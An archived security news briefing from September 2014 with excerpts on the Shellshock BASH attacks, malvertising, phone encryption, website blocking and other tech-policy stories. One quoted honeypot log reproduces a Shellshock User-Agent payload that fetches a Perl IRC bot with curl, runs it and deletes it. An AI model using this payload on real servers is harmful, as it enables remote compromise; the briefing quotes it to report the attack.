twitter facebook rss

ITsecurity Daily News: 09/26/2014

Posted by on September 26, 2014.

The ITsecurity daily security briefing: Friday, September 26, 2014.
If you find this security briefing useful, please spread the word via social media. If you have any comments or recommendations, please email kevtownsend at gmail dot com.


News Papers/Reports WebThings Events M&A Alerts



Google’s ‘Dear Rupert’ blog hits back at News Corp’s attack
SunFP  Google has issued a point-by-point rebuttal of News Corp’s open letter to the EC. It was always going to be a dangerous move to suggest that News Corp is whiter than Google, and probably best left alone. For example:

News Corp:
“The Internet should be a canvas for freedom of expression and for high quality content of enduring value.”

We agree about free expression and the importance of high quality content. Access to information in any given country, particularly news content, used to be controlled by a relatively small number of media organizations. Today, people have far greater choice. That has had a profound impact on newspapers, who face much stiffer competition for people’s attention and for advertising Euros.

  The coup de gras, however is News Corp’s comment: “Undermining the basic business model of professional content creators will lead to a less informed, more vexatious level of dialogue in our society … the intemperate trends we are already seeing in much of Europe will proliferate.” (my emphasis)
  Google simply points to News Corp’s Sun front page shown on the right.
Google Europe Blog:

Bromium Research Highlights Severe Risk of Malicious Ad Networks
  A paper presented by Bromium at VB2014 demonstrates the growing threat from malvertising. “Bypassing ad network defences provides the perfect opportunity for attackers to target millions of users, so it is no coincidence that there has been an uptick in the number of malvertisments,” said Rahul Kashyap, chief security architect, Bromium. “The scale of this problem is as large as the Internet itself.”
The report provides a real-world study of malvertising captured on YouTube, Yahoo and several top Alexa sites.
malvertisingBromium Labs:

Two BASH malware attacks (so far) caught by AlienVault’s honeypot
  “Apart from those hits we have found t[w]o attackers that are using the vulnerability to install two different pieces of malware on the victims. The first one downloads and execute an ELF binary…
  “Apart from that piece of malware, our honeypot received another interesting attack a few hours ago: User-Agent, “() { :;}; /bin/bash -c \”cd /tmp;curl -O ; perl /tmp/jur;rm -rf /tmp/jur\”
  “The file is a PERL script with MD5 0763b8c00d6862d2d0f8f980de065857. It seems it is a repurposed IRC bot that connects to an IRC server and waits for commands…

David Cameron’s porn filter has already progressed to copyright enforcement
  “The UK is now one of the easiest countries in the world to obtain a website blocking injunction on copyright grounds. While much work had to be done initially, having websites filtered out by the leading ISPs is now a streamlined and largely closed-door practice.
  “Child protection issues aside, up until now it has been copyright holders leading the charge for websites to be blacked out. Dozens of sites are affected, with the majority of the world’s leading file-sharing portals now inaccessible by regular means. If the parent company of luxury watchmaker Cartier has its way, soon a new and potentially more widespread wave of website blockades will begin.”
  Corporate control of the internet is a dangerous thing. Cameron’s slippery slope is getting steeper and more slippery by the day. David Cameron is perhaps the most dangerous thing to have ever happened to liberty in the United Kingdom.

FBI blasts Apple, Google for locking police out of phones
  “FBI Director James B. Comey sharply criticized Apple and Google on Thursday for developing forms of smartphone encryption so secure that law enforcement officials cannot easily gain access to information stored on the devices — even when they have valid search warrants…
  “Comey added that FBI officials already have made initial contact with the two companies, which announced their new smartphone encryption initiatives last week. He said he could not understand why companies would ‘market something expressly to allow people to place themselves beyond the law’.”
The Washington Post:

Driving while texting with Google Glass as distracting as phone
  “The first scientific study of driving while texting with Google Glass found that the hands-free eyewear is no safer to use on the road than a smartphone.
  “’When you look at how fast people react to an unexpected traffic event – how fast they slam on their brakes, we didn’t find a statistically significant difference between Google Glass and smartphones,’ said psychological researcher Ben Sawyer at the University of Central Florida.”

Vodafone reveals plan to retain customers’ browsing history
  “Vodafone Hutchison Australia is planning to roll out a system that tracks customers’ web-browsing history and holds the data for almost three months in order to help settle data usage queries.
  “The move comes as the federal government works to introduce legislation that will compel local telecommunications companies and ISP providers hold onto customers’ metadata for a mandatory two years — even though the government is yet to provide a specific definition for what constitutes metadata publicly.

Citizen groups say no to CETA
  “The Canada–European Union Summit, which starts on September 26 in Ottawa, will mark the conclusion of the negotiation of the Comprehensive Economic and Trade Agreement (CETA) between Canada and the European Union. The CETA involves much more than just trade in goods; it will also encompass trade in numerous services, including financial services and public services. In addition, the agreement covers regulatory cooperation, public contracts, agriculture, protection of investors and labour mobility. The texts, which we are told are final, were kept away from the scrutiny of members of parliament throughout the negotiations and have been slow to be made public. This is a notorious subversion of democracy that is intended to suppress any debate, thus presenting our citizenry and elected officials with a fait accompli with no possibility of amendments. Since no parliament will have been able to take a position on its provisions, the Ottawa summit will in essence be a new public relations exercise to publicize the agreement, with the customary speeches and photos. The formal adoption process will follow, and the agreement will then come into force.”
Corporate Europe Observatory:

Over a Hundred Organizations on Both Sides of the Atlantic Strongly Oppose an Agreement that will Enrich Multinational Corporations at the Expense of Citizens’ Rights.
reasons and signatories

Is the discovery of Heartbleed and BASH vulnerabilities an inevitable result of the rise of OSS?
  Chris Stoneff, Director of Professional Services at Lieberman Software, seems to thinks so: “I see this as a failure in the mindset of the open source community where everyone waits for everyone else to do something or find something. One of the interesting things happening with so much bashing of closed source projects like Microsoft and the embrace of more open software like Linux and OSX is how much visibility Linux and OSX have gained in recent years to would be attackers. It has shone a light on one of the biggest lies perpetrated on people: we are not vulnerable because we don’t use Microsoft. Well, the proof is now here and it’s time for Linux and OSX and UNIX to take some heat.”
Lieberman Software:


Whitepapers and Reports


Webcasts and Webinars




Mergers and Acquisitions



Leave a Reply

Your email address will not be published. Required fields are marked *

Submitted in: News, Uncategorized | Tags: , , , , , , , , ,